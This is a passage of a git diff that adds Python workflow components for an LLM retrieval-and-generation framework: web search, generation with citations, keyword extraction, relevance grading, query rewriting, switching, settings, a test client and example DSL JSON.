||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import random
|
||||
from abc import ABC
|
||||
from functools import partial
|
||||
from duckduckgo_search import DDGS
|
||||
import pandas as pd
|
||||
|
||||
from graph.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class DuckDuckGoSearchParam(ComponentParamBase):
|
||||
"""
|
||||
Define the DuckDuckGoSearch component parameters.
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.top_n = 10
|
||||
self.channel = "text"
|
||||
|
||||
def check(self):
|
||||
self.check_positive_integer(self.top_n, "Top N")
|
||||
self.check_valid_value(self.channel, "Web Search or News", ["text", "news"])
|
||||
|
||||
|
||||
class DuckDuckGoSearch(ComponentBase, ABC):
|
||||
component_name = "DuckDuckGoSearch"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
ans = self.get_input()
|
||||
ans = " - ".join(ans["content"]) if "content" in ans else ""
|
||||
if not ans:
|
||||
return Baidu.be_output(self._param.no)
|
||||
|
||||
if self.channel == "text":
|
||||
with DDGS() as ddgs:
|
||||
# {'title': '', 'href': '', 'body': ''}
|
||||
duck_res = ['<a href="' + i["href"] + '">' + i["title"] + '</a> ' + i["body"] for i in
|
||||
ddgs.text(ans, max_results=self._param.top_n)]
|
||||
elif self.channel == "news":
|
||||
with DDGS() as ddgs:
|
||||
# {'date': '', 'title': '', 'body': '', 'url': '', 'image': '', 'source': ''}
|
||||
duck_res = ['<a href="' + i["url"] + '">' + i["title"] + '</a> ' + i["body"] for i in
|
||||
ddgs.news(ans, max_results=self._param.top_n)]
|
||||
|
||||
dr = pd.DataFrame(duck_res, columns=['content'])
|
||||
print(">>>>>>>>>>>>>>>>>>>>>>>>>>\n", dr)
|
||||
return dr
|
||||
164
graph/component/generate.py
Normal file
164
graph/component/generate.py
Normal file
@ -0,0 +1,164 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import re
|
||||
from functools import partial
|
||||
|
||||
import pandas as pd
|
||||
|
||||
from api.db import LLMType
|
||||
from api.db.services.llm_service import LLMBundle
|
||||
from api.settings import retrievaler
|
||||
from graph.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class GenerateParam(ComponentParamBase):
|
||||
"""
|
||||
Define the Generate component parameters.
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.llm_id = ""
|
||||
self.prompt = ""
|
||||
self.max_tokens = 0
|
||||
self.temperature = 0
|
||||
self.top_p = 0
|
||||
self.presence_penalty = 0
|
||||
self.frequency_penalty = 0
|
||||
self.cite = True
|
||||
self.parameters = []
|
||||
|
||||
def check(self):
|
||||
self.check_decimal_float(self.temperature, "[Generate] Temperature")
|
||||
self.check_decimal_float(self.presence_penalty, "[Generate] Presence penalty")
|
||||
self.check_decimal_float(self.frequency_penalty, "[Generate] Frequency penalty")
|
||||
self.check_nonnegative_number(self.max_tokens, "[Generate] Max tokens")
|
||||
self.check_decimal_float(self.top_p, "[Generate] Top P")
|
||||
self.check_empty(self.llm_id, "[Generate] LLM")
|
||||
# self.check_defined_type(self.parameters, "Parameters", ["list"])
|
||||
|
||||
def gen_conf(self):
|
||||
conf = {}
|
||||
if self.max_tokens > 0: conf["max_tokens"] = self.max_tokens
|
||||
if self.temperature > 0: conf["temperature"] = self.temperature
|
||||
if self.top_p > 0: conf["top_p"] = self.top_p
|
||||
if self.presence_penalty > 0: conf["presence_penalty"] = self.presence_penalty
|
||||
if self.frequency_penalty > 0: conf["frequency_penalty"] = self.frequency_penalty
|
||||
return conf
|
||||
|
||||
|
||||
class Generate(ComponentBase):
|
||||
component_name = "Generate"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
|
||||
prompt = self._param.prompt
|
||||
|
||||
retrieval_res = self.get_input()
|
||||
input = "\n- ".join(retrieval_res["content"])
|
||||
for para in self._param.parameters:
|
||||
cpn = self._canvas.get_component(para["component_id"])["obj"]
|
||||
_, out = cpn.output(allow_partial=False)
|
||||
if "content" not in out.columns:
|
||||
kwargs[para["key"]] = "Nothing"
|
||||
else:
|
||||
kwargs[para["key"]] = "\n - ".join(out["content"])
|
||||
|
||||
kwargs["input"] = input
|
||||
for n, v in kwargs.items():
|
||||
# prompt = re.sub(r"\{%s\}"%n, re.escape(str(v)), prompt)
|
||||
prompt = re.sub(r"\{%s\}" % n, str(v), prompt)
|
||||
|
||||
if kwargs.get("stream"):
|
||||
return partial(self.stream_output, chat_mdl, prompt, retrieval_res)
|
||||
|
||||
if "empty_response" in retrieval_res.columns:
|
||||
return Generate.be_output(input)
|
||||
|
||||
ans = chat_mdl.chat(prompt, self._canvas.get_history(self._param.message_history_window_size),
|
||||
self._param.gen_conf())
|
||||
|
||||
if self._param.cite and "content_ltks" in retrieval_res.columns and "vector" in retrieval_res.columns:
|
||||
ans, idx = retrievaler.insert_citations(ans,
|
||||
[ck["content_ltks"]
|
||||
for _, ck in retrieval_res.iterrows()],
|
||||
[ck["vector"]
|
||||
for _, ck in retrieval_res.iterrows()],
|
||||
LLMBundle(self._canvas.get_tenant_id(), LLMType.EMBEDDING,
|
||||
self._canvas.get_embedding_model()),
|
||||
tkweight=0.7,
|
||||
vtweight=0.3)
|
||||
del retrieval_res["vector"]
|
||||
retrieval_res = retrieval_res.to_dict("records")
|
||||
df = []
|
||||
for i in idx:
|
||||
df.append(retrieval_res[int(i)])
|
||||
r = re.search(r"^((.|[\r\n])*? ##%s\$\$)" % str(i), ans)
|
||||
assert r, f"{i} => {ans}"
|
||||
df[-1]["content"] = r.group(1)
|
||||
ans = re.sub(r"^((.|[\r\n])*? ##%s\$\$)" % str(i), "", ans)
|
||||
if ans: df.append({"content": ans})
|
||||
return pd.DataFrame(df)
|
||||
|
||||
return Generate.be_output(ans)
|
||||
|
||||
def stream_output(self, chat_mdl, prompt, retrieval_res):
|
||||
res = None
|
||||
if "empty_response" in retrieval_res.columns and "\n- ".join(retrieval_res["content"]):
|
||||
res = {"content": "\n- ".join(retrieval_res["content"]), "reference": []}
|
||||
yield res
|
||||
self.set_output(res)
|
||||
return
|
||||
|
||||
answer = ""
|
||||
for ans in chat_mdl.chat_streamly(prompt, self._canvas.get_history(self._param.message_history_window_size),
|
||||
self._param.gen_conf()):
|
||||
res = {"content": ans, "reference": []}
|
||||
answer = ans
|
||||
yield res
|
||||
|
||||
if self._param.cite and "content_ltks" in retrieval_res.columns and "vector" in retrieval_res.columns:
|
||||
answer, idx = retrievaler.insert_citations(answer,
|
||||
[ck["content_ltks"]
|
||||
for _, ck in retrieval_res.iterrows()],
|
||||
[ck["vector"]
|
||||
for _, ck in retrieval_res.iterrows()],
|
||||
LLMBundle(self._canvas.get_tenant_id(), LLMType.EMBEDDING,
|
||||
self._canvas.get_embedding_model()),
|
||||
tkweight=0.7,
|
||||
vtweight=0.3)
|
||||
doc_ids = set([])
|
||||
recall_docs = []
|
||||
for i in idx:
|
||||
did = retrieval_res.loc[int(i), "doc_id"]
|
||||
if did in doc_ids: continue
|
||||
doc_ids.add(did)
|
||||
recall_docs.append({"doc_id": did, "doc_name": retrieval_res.loc[int(i), "docnm_kwd"]})
|
||||
|
||||
del retrieval_res["vector"]
|
||||
del retrieval_res["content_ltks"]
|
||||
|
||||
reference = {
|
||||
"chunks": [ck.to_dict() for _, ck in retrieval_res.iterrows()],
|
||||
"doc_aggs": recall_docs
|
||||
}
|
||||
|
||||
if answer.lower().find("invalid key") >= 0 or answer.lower().find("invalid api") >= 0:
|
||||
answer += " Please set LLM API-Key in 'User Setting -> Model Providers -> API-Key'"
|
||||
res = {"content": answer, "reference": reference}
|
||||
yield res
|
||||
|
||||
self.set_output(res)
|
||||
65
graph/component/keyword.py
Normal file
65
graph/component/keyword.py
Normal file
@ -0,0 +1,65 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import re
|
||||
from abc import ABC
|
||||
from api.db import LLMType
|
||||
from api.db.services.llm_service import LLMBundle
|
||||
from graph.component import GenerateParam, Generate
|
||||
from graph.settings import DEBUG
|
||||
|
||||
|
||||
class KeywordExtractParam(GenerateParam):
|
||||
"""
|
||||
Define the KeywordExtract component parameters.
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.top_n = 1
|
||||
|
||||
def check(self):
|
||||
super().check()
|
||||
self.check_positive_integer(self.top_n, "Top N")
|
||||
|
||||
def get_prompt(self):
|
||||
self.prompt = """
|
||||
- Role: You're a question analyzer.
|
||||
- Requirements:
|
||||
- Summarize user's question, and give top %s important keyword/phrase.
|
||||
- Use comma as a delimiter to separate keywords/phrases.
|
||||
- Answer format: (in language of user's question)
|
||||
- keyword:
|
||||
""" % self.top_n
|
||||
return self.prompt
|
||||
|
||||
|
||||
class KeywordExtract(Generate, ABC):
|
||||
component_name = "KeywordExtract"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
q = ""
|
||||
for r, c in self._canvas.history[::-1]:
|
||||
if r == "user":
|
||||
q += c
|
||||
break
|
||||
|
||||
chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
|
||||
ans = chat_mdl.chat(self._param.get_prompt(), [{"role": "user", "content": q}],
|
||||
self._param.gen_conf())
|
||||
|
||||
ans = re.sub(r".*keyword:", "", ans).strip()
|
||||
if DEBUG: print(ans, ":::::::::::::::::::::::::::::::::")
|
||||
return KeywordExtract.be_output(ans)
|
||||
52
graph/component/message.py
Normal file
52
graph/component/message.py
Normal file
@ -0,0 +1,52 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import random
|
||||
from abc import ABC
|
||||
from functools import partial
|
||||
|
||||
import pandas as pd
|
||||
|
||||
from graph.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class MessageParam(ComponentParamBase):
|
||||
|
||||
"""
|
||||
Define the Message component parameters.
|
||||
"""
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.messages = []
|
||||
|
||||
def check(self):
|
||||
self.check_empty(self.messages, "[Message]")
|
||||
return True
|
||||
|
||||
|
||||
class Message(ComponentBase, ABC):
|
||||
component_name = "Message"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
if kwargs.get("stream"):
|
||||
return partial(self.stream_output)
|
||||
|
||||
return Message.be_output(random.choice(self._param.messages))
|
||||
|
||||
def stream_output(self):
|
||||
if self._param.messages:
|
||||
yield {"content": random.choice(self._param.messages)}
|
||||
|
||||
|
||||
80
graph/component/relevant.py
Normal file
80
graph/component/relevant.py
Normal file
@ -0,0 +1,80 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from abc import ABC
|
||||
from api.db import LLMType
|
||||
from api.db.services.llm_service import LLMBundle
|
||||
from graph.component import GenerateParam, Generate
|
||||
from rag.utils import num_tokens_from_string, encoder
|
||||
|
||||
|
||||
class RelevantParam(GenerateParam):
|
||||
|
||||
"""
|
||||
Define the Relevant component parameters.
|
||||
"""
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.prompt = ""
|
||||
self.yes = ""
|
||||
self.no = ""
|
||||
|
||||
def check(self):
|
||||
super().check()
|
||||
self.check_empty(self.yes, "[Relevant] 'Yes'")
|
||||
self.check_empty(self.no, "[Relevant] 'No'")
|
||||
|
||||
def get_prompt(self):
|
||||
self.prompt = """
|
||||
You are a grader assessing relevance of a retrieved document to a user question.
|
||||
It does not need to be a stringent test. The goal is to filter out erroneous retrievals.
|
||||
If the document contains keyword(s) or semantic meaning related to the user question, grade it as relevant.
|
||||
Give a binary score 'yes' or 'no' score to indicate whether the document is relevant to the question.
|
||||
No other words needed except 'yes' or 'no'.
|
||||
"""
|
||||
return self.prompt
|
||||
|
||||
|
||||
class Relevant(Generate, ABC):
|
||||
component_name = "Relevant"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
q = ""
|
||||
for r, c in self._canvas.history[::-1]:
|
||||
if r == "user":
|
||||
q = c
|
||||
break
|
||||
ans = self.get_input()
|
||||
ans = " - ".join(ans["content"]) if "content" in ans else ""
|
||||
if not ans:
|
||||
return Relevant.be_output(self._param.no)
|
||||
ans = "Documents: \n" + ans
|
||||
ans = f"Question: {q}\n" + ans
|
||||
chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
|
||||
|
||||
if num_tokens_from_string(ans) >= chat_mdl.max_length - 4:
|
||||
ans = encoder.decode(encoder.encode(ans)[:chat_mdl.max_length - 4])
|
||||
|
||||
ans = chat_mdl.chat(self._param.get_prompt(), [{"role": "user", "content": ans}],
|
||||
self._param.gen_conf())
|
||||
|
||||
print(ans, ":::::::::::::::::::::::::::::::::")
|
||||
if ans.lower().find("yes") >= 0:
|
||||
return Relevant.be_output(self._param.yes)
|
||||
if ans.lower().find("no") >= 0:
|
||||
return Relevant.be_output(self._param.no)
|
||||
assert False, f"Relevant component got: {ans}"
|
||||
|
||||
|
||||
88
graph/component/retrieval.py
Normal file
88
graph/component/retrieval.py
Normal file
@ -0,0 +1,88 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from abc import ABC
|
||||
|
||||
import pandas as pd
|
||||
|
||||
from api.db import LLMType
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.llm_service import LLMBundle
|
||||
from api.settings import retrievaler
|
||||
from graph.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class RetrievalParam(ComponentParamBase):
|
||||
|
||||
"""
|
||||
Define the Retrieval component parameters.
|
||||
"""
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.similarity_threshold = 0.2
|
||||
self.keywords_similarity_weight = 0.5
|
||||
self.top_n = 8
|
||||
self.top_k = 1024
|
||||
self.kb_ids = []
|
||||
self.rerank_id = ""
|
||||
self.empty_response = ""
|
||||
|
||||
def check(self):
|
||||
self.check_decimal_float(self.similarity_threshold, "[Retrieval] Similarity threshold")
|
||||
self.check_decimal_float(self.keywords_similarity_weight, "[Retrieval] Keywords similarity weight")
|
||||
self.check_positive_number(self.top_n, "[Retrieval] Top N")
|
||||
self.check_empty(self.kb_ids, "[Retrieval] Knowledge bases")
|
||||
|
||||
|
||||
class Retrieval(ComponentBase, ABC):
|
||||
component_name = "Retrieval"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
query = []
|
||||
for role, cnt in history[::-1][:self._param.message_history_window_size]:
|
||||
if role != "user":continue
|
||||
query.append(cnt)
|
||||
query = "\n".join(query)
|
||||
|
||||
kbs = KnowledgebaseService.get_by_ids(self._param.kb_ids)
|
||||
if not kbs:
|
||||
raise ValueError("Can't find knowledgebases by {}".format(self._param.kb_ids))
|
||||
embd_nms = list(set([kb.embd_id for kb in kbs]))
|
||||
assert len(embd_nms) == 1, "Knowledge bases use different embedding models."
|
||||
|
||||
embd_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.EMBEDDING, embd_nms[0])
|
||||
self._canvas.set_embedding_model(embd_nms[0])
|
||||
|
||||
rerank_mdl = None
|
||||
if self._param.rerank_id:
|
||||
rerank_mdl = LLMBundle(kbs[0].tenant_id, LLMType.RERANK, self._param.rerank_id)
|
||||
|
||||
kbinfos = retrievaler.retrieval(query, embd_mdl, kbs[0].tenant_id, self._param.kb_ids,
|
||||
1, self._param.top_n,
|
||||
self._param.similarity_threshold, 1 - self._param.keywords_similarity_weight,
|
||||
aggs=False, rerank_mdl=rerank_mdl)
|
||||
|
||||
if not kbinfos["chunks"]:
|
||||
df = Retrieval.be_output(self._param.empty_response)
|
||||
df["empty_response"] = True
|
||||
return df
|
||||
|
||||
df = pd.DataFrame(kbinfos["chunks"])
|
||||
df["content"] = df["content_with_weight"]
|
||||
del df["content_with_weight"]
|
||||
print(">>>>>>>>>>>>>>>>>>>>>>>>>>\n", query, df)
|
||||
return df
|
||||
|
||||
|
||||
72
graph/component/rewrite.py
Normal file
72
graph/component/rewrite.py
Normal file
@ -0,0 +1,72 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from abc import ABC
|
||||
from api.db import LLMType
|
||||
from api.db.services.llm_service import LLMBundle
|
||||
from graph.component import GenerateParam, Generate
|
||||
|
||||
|
||||
class RewriteQuestionParam(GenerateParam):
|
||||
|
||||
"""
|
||||
Define the QuestionRewrite component parameters.
|
||||
"""
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.temperature = 0.9
|
||||
self.prompt = ""
|
||||
self.loop = 1
|
||||
|
||||
def check(self):
|
||||
super().check()
|
||||
|
||||
def get_prompt(self):
|
||||
self.prompt = """
|
||||
You are an expert at query expansion to generate a paraphrasing of a question.
|
||||
I can't retrieval relevant information from the knowledge base by using user's question directly.
|
||||
You need to expand or paraphrase user's question by multiple ways such as using synonyms words/phrase,
|
||||
writing the abbreviation in its entirety, adding some extra descriptions or explanations,
|
||||
changing the way of expression, translating the original question into another language (English/Chinese), etc.
|
||||
And return 5 versions of question and one is from translation.
|
||||
Just list the question. No other words are needed.
|
||||
"""
|
||||
return self.prompt
|
||||
|
||||
|
||||
class RewriteQuestion(Generate, ABC):
|
||||
component_name = "RewriteQuestion"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
if not hasattr(self, "_loop"):
|
||||
setattr(self, "_loop", 0)
|
||||
if self._loop >= self._param.loop:
|
||||
self._loop = 0
|
||||
raise Exception("Maximum loop time exceeds. Can't find relevant information.")
|
||||
self._loop += 1
|
||||
q = "Question: "
|
||||
for r, c in self._canvas.history[::-1]:
|
||||
if r == "user":
|
||||
q += c
|
||||
break
|
||||
|
||||
chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
|
||||
ans = chat_mdl.chat(self._param.get_prompt(), [{"role": "user", "content": q}],
|
||||
self._param.gen_conf())
|
||||
|
||||
print(ans, ":::::::::::::::::::::::::::::::::")
|
||||
return RewriteQuestion.be_output(ans)
|
||||
|
||||
|
||||
82
graph/component/switch.py
Normal file
82
graph/component/switch.py
Normal file
@ -0,0 +1,82 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from abc import ABC
|
||||
|
||||
import pandas as pd
|
||||
|
||||
from api.db import LLMType
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.llm_service import LLMBundle
|
||||
from api.settings import retrievaler
|
||||
from graph.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class SwitchParam(ComponentParamBase):
|
||||
|
||||
"""
|
||||
Define the Switch component parameters.
|
||||
"""
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
"""
|
||||
{
|
||||
"cpn_id": "categorize:0",
|
||||
"not": False,
|
||||
"operator": "gt/gte/lt/lte/eq/in",
|
||||
"value": "",
|
||||
"to": ""
|
||||
}
|
||||
"""
|
||||
self.conditions = []
|
||||
self.default = ""
|
||||
|
||||
def check(self):
|
||||
self.check_empty(self.conditions, "[Switch] conditions")
|
||||
self.check_empty(self.default, "[Switch] Default path")
|
||||
for cond in self.conditions:
|
||||
if not cond["to"]: raise ValueError(f"[Switch] 'To' can not be empty!")
|
||||
|
||||
def operators(self, field, op, value):
|
||||
if op == "gt":
|
||||
return float(field) > float(value)
|
||||
if op == "gte":
|
||||
return float(field) >= float(value)
|
||||
if op == "lt":
|
||||
return float(field) < float(value)
|
||||
if op == "lte":
|
||||
return float(field) <= float(value)
|
||||
if op == "eq":
|
||||
return str(field) == str(value)
|
||||
if op == "in":
|
||||
return str(field).find(str(value)) >= 0
|
||||
return False
|
||||
|
||||
|
||||
class Switch(ComponentBase, ABC):
|
||||
component_name = "Switch"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
for cond in self._param.conditions:
|
||||
input = self._canvas.get_component(cond["cpn_id"])["obj"].output()[1]
|
||||
if self._param.operators(input.iloc[0, 0], cond["operator"], cond["value"]):
|
||||
if not cond["not"]:
|
||||
return pd.DataFrame([{"content": cond["to"]}])
|
||||
|
||||
return pd.DataFrame([{"content": self._param.default}])
|
||||
|
||||
|
||||
|
||||
|
||||
34
graph/settings.py
Normal file
34
graph/settings.py
Normal file
@ -0,0 +1,34 @@
|
||||
#
|
||||
# Copyright 2019 The FATE Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
# Logger
|
||||
import os
|
||||
|
||||
from api.utils.file_utils import get_project_base_directory
|
||||
from api.utils.log_utils import LoggerFactory, getLogger
|
||||
|
||||
DEBUG = 0
|
||||
LoggerFactory.set_directory(
|
||||
os.path.join(
|
||||
get_project_base_directory(),
|
||||
"logs",
|
||||
"flow"))
|
||||
# {CRITICAL: 50, FATAL:50, ERROR:40, WARNING:30, WARN:30, INFO:20, DEBUG:10, NOTSET:0}
|
||||
LoggerFactory.LEVEL = 30
|
||||
|
||||
flow_logger = getLogger("flow")
|
||||
database_logger = getLogger("database")
|
||||
FLOAT_ZERO = 1e-8
|
||||
PARAM_MAXDEPTH = 5
|
||||
725
graph/templates/HR_callout_zh.json
Normal file
725
graph/templates/HR_callout_zh.json
Normal file
File diff suppressed because one or more lines are too long
620
graph/templates/customer_service.json
Normal file
620
graph/templates/customer_service.json
Normal file
File diff suppressed because one or more lines are too long
335
graph/templates/general_chat_bot.json
Normal file
335
graph/templates/general_chat_bot.json
Normal file
File diff suppressed because one or more lines are too long
158
graph/templates/interpreter.json
Normal file
158
graph/templates/interpreter.json
Normal file
File diff suppressed because one or more lines are too long
49
graph/test/client.py
Normal file
49
graph/test/client.py
Normal file
@ -0,0 +1,49 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import argparse
|
||||
import os
|
||||
from functools import partial
|
||||
import readline
|
||||
from graph.canvas import Canvas
|
||||
from graph.settings import DEBUG
|
||||
|
||||
if __name__ == '__main__':
|
||||
parser = argparse.ArgumentParser()
|
||||
dsl_default_path = os.path.join(
|
||||
os.path.dirname(os.path.realpath(__file__)),
|
||||
"dsl_examples",
|
||||
"retrieval_and_generate.json",
|
||||
)
|
||||
parser.add_argument('-s', '--dsl', default=dsl_default_path, help="input dsl", action='store', required=True)
|
||||
parser.add_argument('-t', '--tenant_id', default=False, help="Tenant ID", action='store', required=True)
|
||||
parser.add_argument('-m', '--stream', default=False, help="Stream output", action='store_true', required=False)
|
||||
args = parser.parse_args()
|
||||
|
||||
canvas = Canvas(open(args.dsl, "r").read(), args.tenant_id)
|
||||
while True:
|
||||
ans = canvas.run(stream=args.stream)
|
||||
print("==================== Bot =====================\n> ", end='')
|
||||
if args.stream and isinstance(ans, partial):
|
||||
cont = ""
|
||||
for an in ans():
|
||||
print(an["content"][len(cont):], end='', flush=True)
|
||||
cont = an["content"]
|
||||
else:
|
||||
print(ans["content"])
|
||||
|
||||
if DEBUG: print(canvas.path)
|
||||
question = input("\n==================== User =====================\n> ")
|
||||
canvas.add_user_input(question)
|
||||
45
graph/test/dsl_examples/categorize.json
Normal file
45
graph/test/dsl_examples/categorize.json
Normal file
@ -0,0 +1,45 @@
|
||||
{
|
||||
"components": {
|
||||
"begin": {
|
||||
"obj":{
|
||||
"component_name": "Begin",
|
||||
"params": {
|
||||
"prologue": "Hi there!"
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": []
|
||||
},
|
||||
"answer:0": {
|
||||
"obj": {
|
||||
"component_name": "Answer",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["categorize:0"],
|
||||
"upstream": ["begin"]
|
||||
},
|
||||
"categorize:0": {
|
||||
"obj": {
|
||||
"component_name": "Categorize",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"category_description": {
|
||||
"product_related": {
|
||||
"description": "The question is about the product usage, appearance and how it works.",
|
||||
"examples": "Why it always beaming?\nHow to install it onto the wall?\nIt leaks, what to do?"
|
||||
},
|
||||
"others": {
|
||||
"description": "The question is not about the product usage, appearance and how it works.",
|
||||
"examples": "How are you doing?\nWhat is your name?\nAre you a robot?\nWhat's the weather?\nWill it rain?"
|
||||
}
|
||||
}
|
||||
}
|
||||
},
|
||||
"downstream": [],
|
||||
"upstream": ["answer:0"]
|
||||
}
|
||||
},
|
||||
"history": [],
|
||||
"path": [],
|
||||
"answer": []
|
||||
}
|
||||
157
graph/test/dsl_examples/customer_service.json
Normal file
157
graph/test/dsl_examples/customer_service.json
Normal file
@ -0,0 +1,157 @@
|
||||
{
|
||||
"components": {
|
||||
"begin": {
|
||||
"obj":{
|
||||
"component_name": "Begin",
|
||||
"params": {
|
||||
"prologue": "Hi! How can I help you?"
|
||||
}
|
||||
},
|
||||
